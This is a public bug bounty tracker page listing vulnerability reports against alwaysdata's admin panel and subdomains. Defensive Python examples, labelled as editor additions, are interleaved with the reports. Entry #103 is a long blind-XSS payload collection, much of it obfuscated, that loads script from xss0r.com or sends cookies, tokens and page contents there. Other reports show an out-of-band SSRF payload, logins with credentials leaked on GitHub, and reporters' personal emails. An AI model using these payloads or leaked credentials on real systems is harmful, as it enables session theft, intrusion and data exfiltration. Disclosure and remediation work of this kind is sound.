Security vulnerabilities

This is the security vulnerability reporting site for alwaysdata. Please make sure you read our bug bounty program before registering and creating a new task to submit a vulnerability you've discovered.

Once processed, the reports are public. Any private information can be transmitted via a support ticket on our administration interface.

ID  Summary  Status (sorted ascending)  Date closed
 34  Unvalidated Input vulnerability in Class_Join feature a...  Assigned  Task Description

Description

An unvalidated input vulnerability has been identified in the class joining process of the platform. By fuzzing the teacher ID parameter in the class_join URL, an attacker can potentially join any class without proper authorization. This issue poses a significant security risk and may lead to unauthorized access to sensitive information and class benefits.

Impact

The potential impact includes:

a) Unauthorized access to sensitive class information
b) Compromised data privacy for both students and instructors.

Proof-of-Concept

To reproduce the vulnerability, follow these steps:

1) First, we log in to a test account. Next, we replay this invite URL I got from an actual tutor invite, but now we manipulate the teacher ID value to grant us unvalidated access to certain classes.
This is the invite URL:

https://admin.alwaysdata.com/academic/attach/?teacher=<TEACHER_ID>

2) Fuzz different values for the ID parameter to find classes that can be accessed without proper authorization. A bit flipper attack would provide the best results.

3) Upon finding a class with a vulnerable ID, join the class by providing the manipulated URL to the unauthorized user.

Mitigation

1) Implement proper input validation and sanitization for the class ID parameter to ensure that only authorized users can join classes. This can be done by assigning a temporary validation token per class_join request.

2) In the absence of token validation, the teacher_id could be encrypted to a longer, more obfuscated value to reduce predictability.

POC || Bit Flipper Video: https://file.io/qy91eQRASzyo
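Added example (editor's, not part of the report above and not alwaysdata's code): one way to implement the per-request validation token proposed under Mitigation 1. The attach URL carries a signed, expiring invite instead of a bare teacher id. The key name SECRET_KEY, the payload layout, the URL parameter name and the function names are assumptions for illustration.

```python
import base64
import hashlib
import hmac
import secrets
import time
from typing import Optional

# Hypothetical server-side key. In production it comes from configuration,
# never from source code.
SECRET_KEY = b"example-invite-signing-key-replace-me"


def _b64(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def _unb64(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def make_invite(teacher_id: int, ttl_seconds: int = 3600, now: Optional[int] = None) -> str:
    """Issue an invite token bound to one teacher.

    payload = "<teacher_id>:<expiry>:<nonce>", followed by an HMAC-SHA256 over it.
    The nonce makes every invite unique; the MAC makes the id field tamper-evident.
    """
    now = int(time.time()) if now is None else now
    payload = f"{teacher_id}:{now + ttl_seconds}:{secrets.token_hex(8)}".encode("ascii")
    mac = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return _b64(payload) + "." + _b64(mac)


def verify_invite(token: str, now: Optional[int] = None) -> Optional[int]:
    """Return the teacher_id the token was issued for, or None if it is malformed,
    tampered with, or expired. Only a verified id is used to attach the student."""
    now = int(time.time()) if now is None else now
    try:
        payload_b64, mac_b64 = token.split(".", 1)
        payload = _unb64(payload_b64)
        mac = _unb64(mac_b64)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):  # constant-time comparison
        return None
    teacher_id, expires, _nonce = payload.decode("ascii").split(":")
    if now >= int(expires):
        return None
    return int(teacher_id)


def tamper_teacher_id(token: str, new_teacher_id: int) -> str:
    """What fuzzing the teacher field amounts to once the id sits inside a signed
    token: swap the id, keep the original MAC. verify_invite() must reject it."""
    payload_b64, mac_b64 = token.split(".", 1)
    _old_id, rest = _unb64(payload_b64).decode("ascii").split(":", 1)
    return _b64(f"{new_teacher_id}:{rest}".encode("ascii")) + "." + mac_b64


if __name__ == "__main__":
    token = make_invite(42, now=1_000)
    print("attach/?invite=" + token)
    print(verify_invite(token, now=1_500))                          # 42
    print(verify_invite(tamper_teacher_id(token, 43), now=1_500))   # None
    print(verify_invite(token, now=5_000))                          # None (expired)
```

The last function reproduces the bit-flipping the report describes, applied to the tokenized URL: changing the id while keeping the MAC fails verification, and a fresh token cannot be guessed because of the nonce. Mitigation 2 (obfuscating the id) only raises the guessing cost; it does not bind the value to an issuance, so any valid value stays reusable indefinitely. The signed form expires, and can be made single-use by recording the nonce when it is redeemed.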

 12  No rate limit on Submit tickets  Closed  15.01.2024  Task Description

Hi team,
I am an ethical hacker, web application penetration tester and bug bounty hunter.
I found a new vulnerability, so I am reporting it to you now.

Vulnerability: No rate limit on Submit tickets

Description:
I have identified a vulnerability in the organization's Submit tickets system, where the request to Submit tickets has no rate limit.

To reproduce this issue, follow the steps below:
Step 1: Go to the organization's website: https://admin.alwaysdata.com/support/add/
Step 2: Fill in the form by typing "1" in the "Subject" field and "2" in the "Message" field, and intercept the request using Burp Suite.
Step 3: Send this request to Intruder, set the payload position on the "1" belonging to the "Subject" field, then go to Payloads and add the numbers 2 to 20.
Step 4: Start the attack.
Step 5: Observe that the 20 tickets are sent to support.
Please see my attached screenshots too.

This demonstrates that the vulnerability allows for mass tickets or tickets bombing to the organization, which is detrimental to business operations.

Impact:
1- Increased Load on Servers: Without a rate limit, there could be a significant increase in the number of requests to the server, which could lead to excessive load.
2- Vulnerability to Attacks: It could make the organization more vulnerable to attacks such as Denial of Service (DoS).
In a DoS attack, an attacker could flood the system with requests, consuming too much network capacity, storage, and memory.
3- Compromised User Experience: If the server is overwhelmed with requests, it could slow down the system for legitimate users.

I used the email address "haneenibra5566@gmail.com".
You can check the tickets that have been sent from it.
I made the above scenario with this email address.

Solution:
To mitigate this vulnerability, it is recommended to implement additional security measures such as adding a CAPTCHA or implementing rate limiting on the invitation endpoint.
By adding these measures, the organization can prevent malicious users from exploiting the system and protect the business and its users from the negative consequences of mass mailing attacks.

I hope my report will keep you safe.

 13  Lack of Verification Email  Closed  16.01.2024  Task Description

Description:

The website lacks proper email verification. During the user registration process, it only sends a greeting email upon registration. The absence of email verification could lead to the creation of unverified accounts and the hosting of content under any email address, which potentially poses a serious security risk.

Impact :

The absence of email verification poses a significant security risk, allowing the potential use of any email address for registration on a hosting site without proper authentication. This could lead to the creation of accounts under false identities, enabling malicious actors to host illegal content anonymously.
The free hosting service, which doesn't require valid details, may be exploited for unauthorized activities, emphasizing the need for robust email verification procedures to ensure account legitimacy and prevent abuse such as:

Spam distribution

Phishing campaigns

Distribution of illegal or harmful content

Reputational damage to the platform

So, I am reporting this issue to the platform's security team to address the vulnerability and enhance overall security.

 14  Potential SSRF Vulnerability via Self-XSS  Closed  18.01.2024  Task Description

Description:

During a penetration test, I discovered a self-XSS vulnerability on the page https://admin.alwaysdata.com/site/resolver/. This vulnerability has the potential to escalate into a Server-Side Request Forgery (SSRF) attack, allowing attackers to make unauthorized requests from the server. This poses risks such as data breaches and potential compromise of internal systems.

While the initial exploitation may require self-XSS, the underlying issue of unvalidated user input leading to SSRF is a critical vulnerability that must be addressed.

Steps To Reproduce:

Step 1: Open Burp Suite.

Step 2: Navigate to https://admin.alwaysdata.com/site/resolver/ in a web browser and capture the traffic. Paste the payloads into the intercepted request body.

Payload 1:

{"addresses":["<script>alert(document.domain);</script>"]}

  (This payload triggers an alert displaying the value of document.domain.)

Payload 2:

{"addresses":["<img src=http://ox7dn3y4fsbqfkyzmmb5alv7i.odiss.eu/>"]}

  (This payload makes unauthorized requests from the server.)

The second payload initiates unauthorized requests from the server. In the above payloads, I utilized OAST to examine the responses.

Impact:

Attackers could steal sensitive information stored on the server.
By crafting malicious URLs, attackers could gain access to internal network resources that are not publicly accessible.
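Added example (editor's, not the report's and not alwaysdata's code): what strict input validation on the resolver body above looks like. It assumes the endpoint's job is to take {"addresses": [...]} and resolve or fetch them; the function names, the item limit and the fake resolver used in place of socket.getaddrinfo are assumptions so the example runs offline.

```python
import ipaddress
import re
from typing import Callable, Dict, List, Tuple

# RFC 1123 label: 1-63 letters/digits/hyphens, no leading or trailing hyphen.
_LABEL = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?<!-)$")


def is_valid_hostname(name: str) -> bool:
    """Strict hostname grammar. Anything with '<', '>', '/', ':' or spaces fails,
    so markup never reaches a resolver, a fetcher or a rendered results page."""
    if not name or len(name) > 253:
        return False
    labels = name.rstrip(".").split(".")
    if labels[-1].isdigit():  # "1.2.3" is not a hostname; inet_aton would read it as an IP
        return False
    return all(_LABEL.match(label) for label in labels)


def is_public_ip(text: str) -> bool:
    """True only for globally routable unicast addresses: loopback, RFC 1918,
    link-local (incl. 169.254.169.254 metadata) and multicast are rejected."""
    try:
        ip = ipaddress.ip_address(text)
    except ValueError:
        return False
    return ip.is_global and not ip.is_multicast


def is_acceptable_target(value: str) -> bool:
    """IP literals are judged by the IP rule, everything else by the hostname rule,
    so '127.0.0.1' cannot slip through as a 'hostname' made of numeric labels."""
    try:
        ipaddress.ip_address(value)
    except ValueError:
        return is_valid_hostname(value)
    return is_public_ip(value)


def validate_addresses(payload: Dict, max_items: int = 20) -> Tuple[List[str], List[str]]:
    """Validate a body of the form {"addresses": [...]}. Returns (accepted, rejected)."""
    items = payload.get("addresses")
    if not isinstance(items, list) or len(items) > max_items:
        return [], ["addresses must be a list of at most %d entries" % max_items]
    accepted, rejected = [], []
    for item in items:
        if not isinstance(item, str):
            rejected.append(repr(item))
            continue
        value = item.strip()
        (accepted if is_acceptable_target(value) else rejected).append(value)
    return accepted, rejected


def resolved_public_targets(hostname: str, resolve: Callable[[str], List[str]]) -> List[str]:
    """Resolve a syntactically valid hostname and keep only public IPs. Connect to the
    returned IPs directly rather than re-resolving, so a DNS rebinding between the
    check and the use cannot swap in an internal address."""
    return [ip for ip in resolve(hostname) if is_public_ip(ip)]


if __name__ == "__main__":
    # Constructed request body mixing the report's payloads with legitimate entries.
    body = {"addresses": [
        "example.com",
        "8.8.8.8",
        "<script>alert(document.domain);</script>",
        "<img src=http://attacker.example/>",
        "127.0.0.1",
        "169.254.169.254",
    ]}
    print(validate_addresses(body))
    # Fake resolver standing in for socket.getaddrinfo so the example runs offline.
    print(resolved_public_targets("internal.example", lambda _h: ["10.0.0.5", "93.184.216.34"]))
```

The grammar check alone is not sufficient: names such as localhost, internal hostnames, or spellings that the C resolver parses as numeric addresses still have to be resolved and the resulting IPs checked, which is what resolved_public_targets does. Rejecting anything that is not a hostname or an IP literal also removes the self-XSS, since no markup is ever stored or echoed back.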

 15  Bug Bounty|User credential Leaked on Github-dork  Closed  18.01.2024  Task Description

Description:
A user's credentials were leaked via a GitHub dork. This could give potential insights into the user's sensitive info, if any.

Steps to Reproduce:
1. GitHub dork: "admin.alwaysdata.com password"
2. Visit this repo: "https://github.com/AndryAurelian101/PHP-project/blob/b3b26287837a34ecb75da46e90ebf01c919d0c1e/www/db_connect.php"
3. You can see that the credentials are leaked.

I was able to log in with the user's credentials for verification.

Impact:
Information disclosure

Mitigation:
Redacting the credentials

 16  Unauthenticated-Video conferencing on "https://jitsi.al ...  Closed  18.01.2024  Task Description

Description: While enumerating subdomains of alwaysdata.com,
I found a subdomain openly hosting video conferencing for all.

Steps to reproduce:
1. Visit the site: "https://jitsi.alwaysdata.com/"
2. Create a video conference: "malicious.conferencing"
3. Now anyone can join the video call with the link provided by the attacker.

This could lead to potential damage to alwaysdata if the attacker intends to exploit this in a malicious way, as this is open to any user on the web.

Impact:

1. Unauthorized Access:

Vulnerability: If the video conferencing system is not properly secured, it may be susceptible to unauthorized access.
Impact: Unauthorized individuals could join sensitive meetings, leading to the potential exposure of confidential information.

2. Phishing Attacks:

Vulnerability: Attackers may exploit the subdomain for phishing attacks, tricking users into providing sensitive information.
Impact: This could lead to the compromise of user credentials or the installation of malware on participants' devices.

3. Data Storage Security:

Vulnerability: Inadequate security measures for storing recorded video conference sessions.
Impact: Stored data may be at risk of unauthorized access, leading to the exposure of sensitive information.

POC:
https://drive.google.com/file/d/17NnRxFnzj7gZFsLXNEzt28b4jYjW7c-d/view?usp=sharing

Mitigation: To mitigate these risks, alwaysdata should implement strong authentication and encrypt communication channels.

 65  Unauthorized Access to Admin Page via Exposed Credentia ...  Closed  28.07.2024  Task Description

Good day Team,
This is Unauthorized Access to Admin Page via Exposed Credentials on GitHub

- admin.alwaysdata.com

Summary:
Sensitive credentials for an admin account were found exposed on a public GitHub repository. Using these credentials, an attacker can gain unauthorized access to the admin page of phpmyadmin.alwaysdata.com.

Description:
Credentials for an admin user were discovered using a Google dork on GitHub. The dork revealed an admin username and password that allowed access to the admin page of phpmyadmin.alwaysdata.com.

Steps to Reproduce:

1. Go to GitHub and use the search dork: "admin.alwaysdata.com" password.
2. Identify a public repository containing the admin username and password.
3. Navigate to https://phpmyadmin.alwaysdata.com/.
4. Use the discovered credentials to log in.
5. Observe that you have successfully logged in as an admin user.

Proof of Concept: https://drive.google.com/file/d/12dmKXf-6hwk-VZdozGl2FyvsbiVjDZA6/view?usp=sharing

Impact:
Unauthorized access to sensitive data and administrative functionalities.

 77  ## Security Report: On click Mark all notifications as  ...  Closed  23.09.2024  Task Description

## Security Report: On click Mark all notifications as read in [admin.alwaysdata.com]

Description

When a specific link is sent to another user and clicked, it causes all their notifications to be marked as read.

### Steps to Reproduce

1. Log into your account on [admin.alwaysdata.com].
2. Send the link to the user. [https://admin.alwaysdata.com/message/toggle/]
3. The recipient clicks on the link.

All notifications for the user who clicks the link are marked as read.

## POC: https://admin.alwaysdata.com/support/77431/379620-bandicam%202024-09-20%2018-30-42-910.mp4

## Impact

Users may lose track of important notifications. In addition, it raises concerns about the security and integrity of user account management, as an attacker could exploit this vulnerability to manipulate notification statuses.
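Added example (editor's, not the report's and not alwaysdata's code) of why a plain link click can change notification state, next to the checks a state-changing handler should make. The session object, the notification store and the treatment of a missing Sec-Fetch-Site header are assumptions; the form field name mirrors Django's csrfmiddlewaretoken, which this site's forms carry.

```python
import hmac
import secrets
from typing import Dict


class Session:
    """Constructed stand-in for a logged-in user's server-side session."""

    def __init__(self, user: str):
        self.user = user
        self.csrf_token = secrets.token_urlsafe(32)
        self.notifications = {"n1": False, "n2": False, "n3": False}  # id -> read?

    def unread(self) -> int:
        return sum(1 for read in self.notifications.values() if not read)


def message_toggle_as_reported(method: str, session: Session) -> int:
    """Mirrors the reported behaviour: any request that carries the victim's
    session cookie, including a GET from a link they were sent, marks all read."""
    for key in session.notifications:
        session.notifications[key] = True
    return 200


def message_toggle_hardened(method: str, session: Session,
                            form: Dict[str, str], headers: Dict[str, str]) -> int:
    # 1. Safe methods never change state: a link click is a GET, so it cannot fire this.
    if method != "POST":
        return 405
    # 2. The form must carry the token tied to this session; compare in constant time.
    submitted = form.get("csrfmiddlewaretoken", "").encode("utf-8")
    if not hmac.compare_digest(submitted, session.csrf_token.encode("utf-8")):
        return 403
    # 3. Defence in depth: browsers label cross-site requests; refuse them.
    #    A missing header is treated as same-origin here (assumption, for old clients).
    if headers.get("Sec-Fetch-Site", "same-origin") not in ("same-origin", "none"):
        return 403
    for key in session.notifications:
        session.notifications[key] = True
    return 200


if __name__ == "__main__":
    victim = Session("victim")
    print(message_toggle_as_reported("GET", victim), victim.unread())       # 200 0
    victim = Session("victim")
    print(message_toggle_hardened("GET", victim, {}, {}), victim.unread())  # 405 3
    form = {"csrfmiddlewaretoken": victim.csrf_token}
    print(message_toggle_hardened("POST", victim, form,
                                  {"Sec-Fetch-Site": "same-origin"}), victim.unread())  # 200 0
```

Requiring POST is what stops the link-in-a-message vector on its own; the token check is what stops a cross-site form that auto-submits a POST, and the Sec-Fetch-Site check is a second line behind it.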

 78  **Title:** Access Control Vulnerability in Two-Factor A ...  Closed  23.09.2024  Task Description

Title: Access Control Vulnerability in Two-Factor Authentication Management

Summary: This report highlights a security vulnerability related to user account management and two-factor authentication (2FA) within the system. The issue arises when a user invites another user to manage their account, creating a loophole that allows continued access even after 2FA is disabled.

Steps to Reproduce:

1. Account Creation:

  1. A user creates a new account on [admin.alwaysdata.com].

2. Invite for Account Management:

  1. The account owner invites another user to manage their account. The system requires that the invited user enables two-factor authentication on their account to gain management privileges.

3. Two-Factor Authentication Activation:

  1. The invited user successfully activates two-factor authentication.

4. Management Access Granted:

  1. The invited user can now manage the account of the account owner without restrictions.

5. Disable Two-Factor Authentication:

  1. The invited user disables two-factor authentication on their account.

6. Continued Management Access:

  1. Despite the deactivation of 2FA, the invited user retains the ability to manage the account of the account owner. This is contrary to the initial requirement that 2FA must be active for management access.

7. Session Management Issues:

  1. If the invited user logs out and logs back in, they are prompted to re-enable 2FA to regain management access. However, this inconsistency presents a potential security risk during active sessions, where the user can keep their session for up to two weeks.

## POC: https://admin.alwaysdata.com/support/81354/

Impact: This vulnerability allows an invited user to maintain management privileges over another user’s account, even after failing to comply with security requirements (2FA). If a malicious element manages to hijack the invited user's session, they can control the account owner’s settings without their consent, leading to potential data breaches
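Added example (editor's, not the report's and not alwaysdata's code) contrasting the behaviour the report describes, a management decision cached at login, with a check that is re-evaluated on every request, plus the complementary step of clearing cached decisions when 2FA is switched off. The data model and function names are assumptions.

```python
from dataclasses import dataclass, field
from typing import Dict, Iterable, Set


@dataclass
class User:
    name: str
    two_factor_enabled: bool = False


@dataclass
class Account:
    owner: User
    managers: Set[str] = field(default_factory=set)   # names of invited users


@dataclass
class Session:
    user: User
    # Authorization decision cached at login. This is what goes stale in the report.
    manager_ok: Dict[str, bool] = field(default_factory=dict)


def can_manage_as_reported(session: Session, account: Account) -> bool:
    """Decide once per session, then trust the cached answer for its lifetime."""
    key = account.owner.name
    if key not in session.manager_ok:
        session.manager_ok[key] = (session.user.name in account.managers
                                   and session.user.two_factor_enabled)
    return session.manager_ok[key]


def can_manage(session: Session, account: Account) -> bool:
    """Hardened: re-evaluate both the invitation and the 2FA state on every request."""
    return session.user.name in account.managers and session.user.two_factor_enabled


def disable_two_factor(user: User, active_sessions: Iterable[Session]) -> None:
    """Complementary fix: when 2FA is switched off, drop cached decisions in all of that
    user's live sessions instead of waiting up to two weeks for them to expire."""
    user.two_factor_enabled = False
    for session in active_sessions:
        if session.user is user:
            session.manager_ok.clear()


if __name__ == "__main__":
    owner = User("owner")
    invited = User("invited", two_factor_enabled=True)
    account = Account(owner, managers={"invited"})
    session = Session(invited)
    print(can_manage_as_reported(session, account), can_manage(session, account))  # True True
    invited.two_factor_enabled = False   # step 5 of the report
    print(can_manage_as_reported(session, account), can_manage(session, account))  # True False
    disable_two_factor(invited, [session])
    print(can_manage_as_reported(session, account))                                # False
```

Re-checking on every request costs one lookup of the delegate's current 2FA flag; the session should carry identity only, never the outcome of an authorization decision.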

 102  Reflective XSS  Closed  25.11.2024  Task Description

Hi Team, I have found a reflected XSS in your URL

http://phppgadmin.alwaysdata.com/phppgadmin/index.php?server=8890

When I use this payload it triggers an alert:

https://phppgadmin.alwaysdata.com/phppgadmin/index.php?server=%22{text%3a%3Cimg%2fsrc%3dx+onload%3dconfirm(1)%3E}%22

Please reach out to me; my email ID is sabeesh.harinarayanan@gmail.com for the POC, as I am unable to attach it here.

Regards
Sabeesh

 103  bxss  Closed  25.11.2024  Task Description

'"><script src=https://xss0r.com/c/sabeesh></script>
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzMHIuY29tL2Mvc2FiZWVzaCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs6; onerror=eval(atob(this.id))>
javascript:eval('var a=document.createElement(\'script\');a.src=\'https://xss0r.com/c/sabeesh\';document.body.appendChild(a)')
"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzMHIuY29tL2Mvc2FiZWVzaCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs6; autofocus>
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzMHIuY29tL2Mvc2FiZWVzaCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs6;>
"><iframe srcdoc="&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#118;&#97;&#114;&#32;&#97;&#61;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#114;&#101;&#97;&#116;&#101;&#69;&#108;&#101;&#109;&#101;&#110;&#116;&#40;&#34;&#115;&#99;&#114;&#105;&#112;&#116;&#34;&#41;&#59;&#97;&#46;&#115;&#114;&#99;&#61;&#34;&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#120;&#115;&#115;&#48;&#114;&#46;&#99;&#111;&#109;&#47;&#99;&#47;&#115;&#97;&#98;&#101;&#101;&#115;&#104;&#34;&#59;&#112;&#97;&#114;&#101;&#110;&#116;&#46;&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#98;&#111;&#100;&#121;&#46;&#97;&#112;&#112;&#101;&#110;&#100;&#67;&#104;&#105;&#108;&#100;&#40;&#97;&#41;&#59;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;">
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "xss0r.com/c/sabeesh");a.send();</script>
<script>$.getScript("
xss0r.com/c/sabeesh")</script>
var a=document.createElement("script");a.src="https://xss0r.com/c/sabeesh";document.body.appendChild(a);
'"></Title/</StYle/</TeXtarEa/</ScRipt/</NoScRiPt/</SeLeCt/</OpTiOn/</Svg/''"><svg/onload=javascript:eval(atob('dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8veHNzMHIuY29tL2Mvc2FiZWVzaCI7ZG9jdW1lbnQuYm9keS5hcHBlbmQoYSk7')) '"><img src=x onerror="eval(atob('dmFyIGEgPSBkb2N1bWVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTthLnNyYyA9ICdodHRwczovL3hzczByLmNvbS9jL3NhYmVlc2gnO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7'))">
"><img src=&#104;&#116;&#116;&#112;&#115;&#58;&#47;&#47;&#120;&#115;&#115;&#48;&#114;&#46;&#99;&#111;&#109;&#47;&#99;&#47;&#115;&#97;&#98;&#101;&#101;&#115;&#104; onerror=&#101;&#118;&#97;&#108;&#40;&#97;&#116;&#111;&#98;&#40;&#116;&#104;&#105;&#115;&#46;&#115;&#114;&#99;&#41;&#41;>
'"<img src="https://xss0r.com/c/sabeesh" onerror='this.src="https://xss0r.com/c/sabeesh"'>
'"<img src=x onerror='this.src="https://xss0r.com/c/sabeesh"'>
'"<img src=x onerror='fetch("https://xss0r.com/c/sabeesh",{method:"POST",body:btoa(document.body.innerHTML),mode:"no-cors"})'>
'"<iframe src='javascript:window.location="https://xss0r.com/c/sabeesh"'></iframe>
'"<iframe srcdoc='<script>window.location="https://xss0r.com/c/sabeesh"</script>'></iframe>
'"<iframe srcdoc='<script>fetch("https://xss0r.com/c/sabeesh",{method:"POST",body:btoa(parent.document.body.innerHTML),mode:"no-cors"})</script>'></iframe>
'"<object data='javascript:window.location="https://xss0r.com/c/sabeesh"'></object>
<input onfocus='fetch("https://xss0r.com/c/sabeesh",{method:"POST",mode:"no-cors"})' autofocus>
'"<script type="text/javascript" src="https://xss0r.com/c/sabeesh"></script>
'"<script type="module" src="https://xss0r.com/c/sabeesh"></script>
'"<script nomodule src="https://xss0r.com/c/sabeesh"></script>
javascript:window.location="https://xss0r.com/c/sabeesh"
javascript:fetch("https://xss0r.com/c/sabeesh")
--></tiTle></stYle></texTarea></scrIpt>"
'><scrIpt src="https://xss0r.com/c/sabeesh"></scrIpt>
'"<img src="https://xss0r.com/c/sabeesh" onerror="this.src='https://xss0r.com/c/sabeesh'">
'"<svg/onload="window.location.href='https://xss0r.com/c/sabeesh'">
'"<audio src onerror='fetch("https://xss0r.com/c/sabeesh",{method:"POST",mode:"no-cors"})'>
'"<script>new Image().src="https://xss0r.com/c/sabeesh"</script>
'"<form action="https://xss0r.com/c/sabeesh" method="POST"><input name="data" value=""></form><script>document.forms[0].submit();</script>
'"<iframe src="javascript:fetch('https://xss0r.com/c/sabeesh')"></iframe>
'"<link rel="stylesheet" href="https://xss0r.com/c/sabeesh" onerror='fetch("https://xss0r.com/c/sabeesh")'>
'"<meta http-equiv="refresh" content="0;url=https://xss0r.com/c/sabeesh">
'"<object data="https://xss0r.com/c/sabeesh" onerror='this.data="https://xss0r.com/c/sabeesh"'></object>
javascript:fetch("https://xss0r.com/c/sabeesh")
'"<svg/onload="fetch('https://xss0r.com/c/sabeesh'">
{constructor.constructor('fetch("https://xss0r.com/c/sabeesh"')()}
'"<img src=x onerror="fetch('https://xss0r.com/c/sabeesh')">
'"></script></title></textarea><script src=
https://xss0r.com/c/sabeesh></script>
'"<svg/onload='var a="fetch";var b="https://xss0r.com/c/sabeesh"; setTimeout(a+"(b)",1000)'>
'"<iframe src="javascript:setTimeout('fetch(\"https://xss0r.com/c/sabeesh\")', 1000)"></iframe>
'"<form id='xss'><button form='xss' formaction='javascript:fetch("https://xss0r.com/c/sabeesh")'>Click Me</button></form>
'/*'/*`/*--></noscript></title></textarea></style></template></noembed></script>"'><scrIpt src="https://xss0r.com/c/sabeesh"></scrIpt>
'"><img src=x onerror=setTimeout(String.fromCharCode(102,101,116,99,104)+'("https://xss0r.com//sabeesh")', 0)>
'"><script>'/*'/*`/*--><svg onload=fetch("https://xss0r.com/c/sabeesh")></script>
'"?><svg/onload="fetch('https://xss0r.com/c/sabeesh?cookie='+document.cookie)">
<img src=x onerror="setTimeout(function(){fetch('https://xss0r.com/c/sabeesh?data='+document.cookie)},10)"
>
<input autofocus onfocus="fetch('https://xss0r.com/c/sabeesh?token='+document.cookie)">
<iframe src="javascript:void(0)" onload="fetch('https://xss0r.com/c/sabeesh?url='+location.href)"
><!--" -->
'"></title></textarea></script></style></noscript><script src=https://xss0r.com/c/sabeesh></script>
ibrahim'"<script src=https://xss0r.com/c/sabeesh></script>
ibro%27%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%3E%3C%2Fscript%3E
--></tiTle></stYle></texTarea></scrIpt>"'><scrIpt src=https://xss0r.com/c/sabeesh></scrIpt>
/*'/*`/*--></noscript></title></textarea></style></template></noembed></script>"'><scrIpt src="https://xss0r.com/c/sabeesh"></scrIpt>
-'"><Svg Src=xss0r.com/c/sabeesh/s OnLoad=import(this.getAttribute('src')+0)>
email%5D=zer0_sec+1%22%3E%3Cscript+src%3D%22https%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%22%3E%3C%2Fscript%3E%40ibro1337%40gmail.com
<input onmouseover="fetch('https://xss0r.com/c/sabeesh?cookie='+document.cookie)">
'"><Svg Src=
xss0r.com/c/sabeesh/s OnLoad=import(this.getAttribute('src')+0)>
'"><Img Src=xss0r.com/c/sabeesh/x Onload=import(src+0)>
'/*\'/*"/*\"/*</Script><Input/AutoFocus/OnFocus=/**/(import(/https:https://xss0r.com/c/sabeesh\00?1=1290/.source))
>
\"><input autofocus nope="%26quot;x%26quot;" onfocus="frames.location='https://xss0r.com/c/sabeesh?c='+Reflect.get(document,'coo'+'kie')">
\"></script><img src="x" onerror="with(document)body.appendChild(createElement('script')).src='https://xss0r.com/c/sabeesh'">
<p><img src="https://xss0r.com/c/sabeesh" border="0" />--&gt;</p>
'"></title></textarea></script></style></noscript><script src=https://xss0r.com/c/sabeesh></script>
<script>$.getScript("https://xss0r.com/c/sabeesh")</script>
';"/></textarea></script><script src=xss0r.com/c/sabeesh>
zer0_sec+1%22%3E%3Cscript+src%3D%22https%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%22%3E%3C%2Fscript%3E%40ibro1337%40gmail.com
zer0_sec 1"><script src="https://xss0r.com/c/sabeesh"></script>@ibro1337@gmail.com ibro1337%40gmail.com%22%3E%3Cscript%20src%3D%22https%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%22%3E%3C%2Fscript%3E
ibro1337@gmail.com"><script src="https://xss0r.com/c/sabeesh"></script>
{globalThis.constructor("fetch('https://xss0r.com/c/sabeesh?cookie='+document.cookie)")()}
ibro1337@gmail.com<!--" --><script src=https://xss0r.com/c/sabeesh></script>
ibro1337%40gmail.com%22%3E%3Cscript%20src%3D%22https%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%22%3E%3C%2Fscript%3E
ibro1337@gmail.com"><svg onload="fetch('https://xss0r.com/c/sabeesh?cookie='+document.cookie)"></svg>
<iframe src="https://xss0r.com" onload="fetch('https://xss0r.com/c/sabeesh?cookie=' + document.cookie)"></iframe>
</script><Iframe SrcDoc="><script src=https://xss0r.com/c/sabeesh></script>">
%3C%2Fscript%3E%3CIframe%20SrcDoc%3D%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%3E%3C%2Fscript%3E%22%3E
%253C%252Fscript%253E%253CIframe%2520SrcDoc%253D%2522%253E%253Cscript%2520src%253Dhttps%253A%252F%252Fxss0r.com%252Fc%252Fsabeesh%253E%253C%252Fscript%253E%2522%253E
--></tiTle></stYle></texTarea></scrIpt>"
'><scrIpt src="https://xss0r.com/c/sabeesh"></scrIpt>
--%3E%3C%2FtiTle%3E%3C%2FstYle%3E%3C%2FtexTarea%3E%3C%2FscrIpt%3E%22%2F%2F%27%2F%2F%3E%3CscrIpt%20src%3D%22https%3A%2F%2Fxss0r.com%2Fc%2Fsabeesh%22%3E%3C%2Fscript%3E
